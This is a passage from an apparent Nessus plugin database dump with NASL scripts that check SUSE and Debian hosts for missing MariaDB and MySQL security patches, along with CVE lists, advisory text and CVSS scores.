script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) 
flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-tools-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-tools-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", 
reference:\"libmysqlclient_r18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", 
cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.29-22.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.29-22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:47:09", "description": "This mysql version update to 5.5.54 fixes the following issues :\n\n - CVE-2017-3318: Unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: Unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3313: Unspecified vulnerability affecting the\n MyISAM component (bsc#1020890)\n\n - CVE-2017-3312: Insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: Unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: Unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: Unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3244: Unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: Unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: Unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n Release Notes:\n http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-\n 54.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription 
block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-07T00:00:00", "title": "SUSE SLES11 Security Update : mysql (SUSE-SU-2017:0408-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3258"], "modified": "2017-02-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:mysql", "p-cpe:/a:novell:suse_linux:mysql-tools", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:libmysql55client18", "p-cpe:/a:novell:suse_linux:libmysql55client_r18", "p-cpe:/a:novell:suse_linux:mysql-client"], "id": "SUSE_SU-2017-0408-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0408-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97046);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n\n script_name(english:\"SUSE SLES11 Security Update : mysql (SUSE-SU-2017:0408-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"This mysql version update to 5.5.54 fixes the following issues :\n\n - CVE-2017-3318: Unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: Unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3313: Unspecified vulnerability affecting the\n MyISAM component (bsc#1020890)\n\n - CVE-2017-3312: Insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: Unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: Unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: Unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3244: Unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: Unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: Unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n Release Notes:\n http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-\n 54.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3238/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3243/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3244/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3258/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3265/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3312/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3313/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3317/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3318/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170408-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f341f135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-mysql-12971=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-mysql-12971=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-mysql-12971=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-mysql-12971=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-mysql-12971=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-mysql-12971=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-mysql-12971=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-mysql-12971=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-mysql-12971=1\n\nTo 
bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysql55client18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysql55client_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libmysql55client_r18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libmysql55client_r18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libmysql55client18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libmysql55client_r18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mysql-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mysql-client-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mysql-tools-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libmysql55client18-32bit-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libmysql55client18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libmysql55client_r18-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mysql-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mysql-client-5.5.54-0.35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mysql-tools-5.5.54-0.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:50:03", "description": "Several issues have been discovered in the MariaDB database server.\nThe vulnerabilities are addressed by upgrading MariaDB to the new\nupstream version 10.0.29. Please see the MariaDB 10.0 Release Notes\nfor further details :\n\n -\n https://mariadb.com/kb/en/mariadb/mariadb-10029-release-\n notes/", "edition": 28, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-23T00:00:00", "title": "Debian DSA-3770-1 : mariadb-10.0 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-01-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mariadb-10.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3770.NASL", "href": "https://www.tenable.com/plugins/nessus/96669", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3770. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96669);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_xref(name:\"DSA\", value:\"3770\");\n\n script_name(english:\"Debian DSA-3770-1 : mariadb-10.0 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in the MariaDB database server.\nThe vulnerabilities are addressed by upgrading MariaDB to the new\nupstream version 10.0.29. 
Please see the MariaDB 10.0 Release Notes\nfor further details :\n\n -\n https://mariadb.com/kb/en/mariadb/mariadb-10029-release-\n notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842895\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851755\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/mariadb-10.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mariadb-10.0 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 10.0.29-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mariadb-10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/23\");\n 
